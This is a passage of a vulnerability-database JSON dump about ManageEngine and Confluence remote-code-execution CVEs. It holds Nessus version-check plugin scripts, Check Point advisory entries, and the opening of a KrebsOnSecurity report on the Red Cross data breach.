later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-40539\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine ADSelfService Plus CVE-2021-40539');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_adselfservice_plus\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_adselfservice_detect.nasl\");\n script_require_keys(\"installed_sw/ManageEngine ADSelfService Plus\");\n script_require_ports(\"Services/www\", 8888);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_zoho.inc');\ninclude('http.inc');\n\nvar app, app_info, constraints, port;\n\napp = 'ManageEngine ADSelfService Plus';\n\n# Exit if app is not detected on this http port\nport = get_http_port(default:8888);\n\napp_info = vcf::zoho::fix_parse::get_app_info(\n app: app,\n port: port,\n webapp: TRUE\n);\n\nconstraints = [\n { 'fixed_version':'6114', 'fixed_display':'build 6114'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-04T15:33:47", "description": "The Zoho ManageEngine ADSelfService Plus running on the remote host is affected by an authentication bypass vulnerability in the REST API which can lead to remote code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-11-08T00:00:00", "type": "nessus", "title": "ManageEngine ADSelfServicePlus Authentication Bypass (CVE-2021-40539)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2022-05-03T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_adselfservice_plus"], "id": "MANAGEENGINE_ADSELFSERVICE_PLUS_CVE-2021-40539.NBIN", "href": "https://www.tenable.com/plugins/nessus/154964", "sourceData": "Binary data manageengine_adselfservice_plus_CVE-2021-40539.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-04T15:30:45", "description": "The ManageEngine EventLog Analyzer running on the remote host is affected by a security restriction bypass vulnerability due to improper validation of user-supplied data. An unauthenticated, remote attacker can exploit this, via a specially crafted message, to execute arbitrary code on the remote host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-10-04T00:00:00", "type": "nessus", "title": "ManageEngine EventLog Analyzer < Build 12201 REST API Restriction Bypass RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2022-05-03T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_eventlog_analyzer"], "id": "MANAGEENGINE_EVENTLOG_ANALYZER_CVE-2021-40539.NBIN", "href": "https://www.tenable.com/plugins/nessus/153848", "sourceData": "Binary data manageengine_eventlog_analyzer_cve-2021-40539.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-04T15:28:01", "description": "The ManageEngine Log360 running on the remote host is affected by a security restriction bypass vulnerability due to improper validation of user-supplied data. An unauthenticated, remote attacker can exploit this, via a specially crafted message, to execute arbitrary code on the remote host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-24T00:00:00", "type": "nessus", "title": "ManageEngine Log360 < Build 5229 REST API Restriction Bypass RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2022-05-03T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_log360"], "id": "MANAGEENGINE_LOG360_CVE-2021-40539.NBIN", "href": "https://www.tenable.com/plugins/nessus/153636", "sourceData": "Binary data manageengine_log360_cve-2021-40539.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-04T15:23:35", "description": "The ManageEngine Desktop Central application running on the remote host is version 10 prior to build 100479.\nIt is, therefore, affected by a remote code execution vulnerability.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-10T00:00:00", "type": "nessus", "title": "ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2022-05-03T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_CVE-2020-10189.NBIN", "href": "https://www.tenable.com/plugins/nessus/135293", "sourceData": "Binary data manageengine_desktop_central_cve-2020-10189.nbin", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:54:26", "description": "The ManageEngine Desktop Central application running on the remote host is version 10 prior to build 100479. It is, therefore, affected by a remote code execution vulnerability.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-19T00:00:00", "type": "nessus", "title": "ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2022-01-24T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "href": "https://www.tenable.com/plugins/nessus/134677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134677);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/24\");\n\n script_cve_id(\"CVE-2020-10189\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote\nhost is version 10 prior to build 100479. It is, therefore, affected by\na remote code execution vulnerability.\");\n # https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b517c025\");\n # https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9944baef\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central version 10 build 100479 or\nlater. Alternatively, apply the manual, vendor-supplied workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-10189\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine Desktop Central Java Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/19\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 8020, 8383, 8040);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n# Cannot know if manual workaround is in place.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nappname = \"ManageEngine Desktop Central\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\nport = get_http_port(default:8020);\n\ninstall = get_single_install(\n app_name : appname,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\nversion = install[\"version\"];\nbuild = install[\"build\"];\nismsp = install[\"MSP\"];\nrep_version = version;\n\ninstall_url = build_url(port:port, qs:dir);\n\nif (ismsp) appname += \" MSP\";\n\nif (build == UNKNOWN_VER)\n exit(0, \"The build number of \"+appname+\" version \" +rep_version+ \" listening at \" +install_url+ \" could not be determined.\");\nelse\n rep_version += \" Build \" + build;\n\nbuild = int(build);\nif (version =~ \"^10(\\.|$)\" && build < 100479)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + rep_version +\n '\\n Fixed version : 10 Build 100479' +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url, rep_version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-12T11:58:15", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 7.12.x < 7.12.5 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112964", "href": "https://www.tenable.com/plugins/was/112964", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-12T11:58:13", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.13.23 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112961", "href": "https://www.tenable.com/plugins/was/112961", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-12T11:58:09", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 7.5.x < 7.11.6 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112963", "href": "https://www.tenable.com/plugins/was/112963", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-12T11:58:14", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled.\n\nThe affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-01T00:00:00", "type": "nessus", "title": "Atlassian Confluence Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-08T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112944", "href": "https://www.tenable.com/plugins/was/112944", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-12T11:58:13", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 6.14.x < 7.4.11 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112962", "href": "https://www.tenable.com/plugins/was/112962", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-20T14:14:26", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-08-26T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.13.23 / 6.14 < 7.4.11 / 7.5 < 7.11.6 / 7.12 < 7.12.5 Webwork OGNL Injection (CONFSERVER-67940)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CONFSERVER-67940.NASL", "href": "https://www.tenable.com/plugins/nessus/152864", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152864);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2021-26084\");\n script_xref(name:\"IAVA\", value:\"2021-A-0397\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Atlassian Confluence < 6.13.23 / 6.14 < 7.4.11 / 7.5 < 7.11.6 / 7.12 < 7.12.5 Webwork OGNL Injection (CONFSERVER-67940)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by an OGNL injection vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian Confluence application running on the remote host is \nprior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection\nvulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute\narbitrary code on a Confluence Server or Data Center instance.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cb62fdb\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/CONFSERVER-67940\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 6.13.23, 7.4.11, 7.11.6, 7.12.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26084\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence WebWork OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:'confluence', port:port, webapp:true);\n\nvar constraints = [\n {'fixed_version' : '6.13.23' },\n {'min_version' : '6.14', 'fixed_version' : '7.4.11' },\n {'min_version' : '7.5', 'fixed_version' : '7.11.6' },\n {'min_version' : '7.12', 'fixed_version' : '7.12.5', 'fixed_display' : '7.12.5 / 7.13.0'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-20T14:17:55", "description": "The remote Atlassian Confluence application running on the remote host is affected by an OGNL injection vulnerability that would allow an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance by sending a specially crafted HTTP request.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-07T00:00:00", "type": "nessus", "title": "Atlassian Confluence Server Webwork OGNL Injection (CVE-2021-26084)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2022-05-03T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE_2021_26084.NBIN", "href": "https://www.tenable.com/plugins/nessus/153087", "sourceData": "Binary data confluence_cve_2021_26084.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:30", "description": "An authentication bypass vulnerability exists in Zoho ManageEngine ADSelfService Plus. Successful exploitation of this vulnerability would allow remote attackers to gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-14T00:00:00", "type": "checkpoint_advisories", "title": "Zoho ManageEngine ADSelfService Plus Authentication Bypass (CVE-2021-40539)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-14T00:00:00", "id": "CPAI-2021-0879", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:40:23", "description": "A remote code execution vulnerability exists in Zoho ManageEngine Desktop Central. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-08T00:00:00", "type": "checkpoint_advisories", "title": "Zoho ManageEngine Remote Code Execution (CVE-2020-10189)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-08T00:00:00", "id": "CPAI-2020-0118", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:29:45", "description": "A remote code execution vulnerability exists in Atlassian Confluence. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-05T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence Remote Code Execution (CVE-2021-26084)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-09T00:00:00", "id": "CPAI-2021-0548", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2022-02-16T19:27:08", "description": "A network intrusion at the **International Committee for the Red Cross** (ICRC) in January led to the theft of personal information on more than 500,000 people receiving assistance from the group. KrebsOnSecurity has learned that the email address used by a cybercriminal actor who offered to sell the stolen ICRC data also was used to register multiple domain names the FBI says are tied to a sprawling media influence operation originating from Iran.\n\n\n\nOn Jan. 19, the ICRC disclosed the compromise of servers hosting the personal information of more than 500,000 people receiving services from the [Red Cross and Red Crescent Movement](<https://en.wikipedia.org/wiki/International_Red_Cross_and_Red_Crescent_Movement>). The ICRC said the hacked servers contained data relating to the organization&#x27;s **Restoring Family Links** services, which works to reconnect people separated by war, violence, migration and other causes.\n\nThe same day the ICRC went public with its breach, someone using the nickname &quot;**Sheriff**&quot; on the English-language cybercrime forum **RaidForums** advertised the sale of data from the Red Cross and Red Crescent Movement. Sheriff&#x27;s sales thread suggests the ICRC was asked to pay a ransom to guarantee the data wouldn&#x27;t be leaked or sold online.\n\n&quot;Mr. Mardini, your words have been heard,&quot; Sheriff wrote, posting a link to the Twitter profile of **ICRC General Director Robert Mardini** and urging forum members to tell him to check his email. &quot;Check your email and send a figure you can pay.&quot;\n\n\n\nRaidForums member &quot;unindicted&quot; aka Sheriff selling access to the International Red Cross and Red Crescent Movement data. Image: Ke-la.com\n\nIn their [online statement about the hack](<https://www.icrc.org/en/document/cyber-attack-icrc-what-we-know>) (updated on Feb. 7) the ICRC said it had not had any contact with the hackers, and no ransom demand had been made.\n\n&quot;In line with our standing practice to engage with any actor who can facilitate or impede our humanitarian work, we are willing to communicate directly and confidentially with whoever may be responsible for this operation to impress upon them the need to respect our humanitarian action,&quot; the ICRC statement reads.\n\nAsked to comment on Sheriff&#x27;s claims, the ICRC issued the following statement:\n\n&quot;Right now, we do not have any conclusive evidence that this information from the data breach has been published or is being traded. Our cybersecurity team has looked into any reported allegation of data being available on the dark web.&quot;\n\n**Update, 2:00 p.m., ET:** The ICRC just published an update to its [FAQ on the breach](<https://www.icrc.org/en/document/cyber-attack-icrc-what-we-know>). The ICRC now says the hackers broke in on Nov. 9, 2021, using an unpatched critical vulnerability (CVE-2021-40539). &quot;This vulnerability allows malicious cyber actors to place web shells and conduct post-exploitation activities such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files. Once inside our network, the hackers were able to deploy offensive security tools which allowed them to disguise themselves as legitimate users or administrators. This in 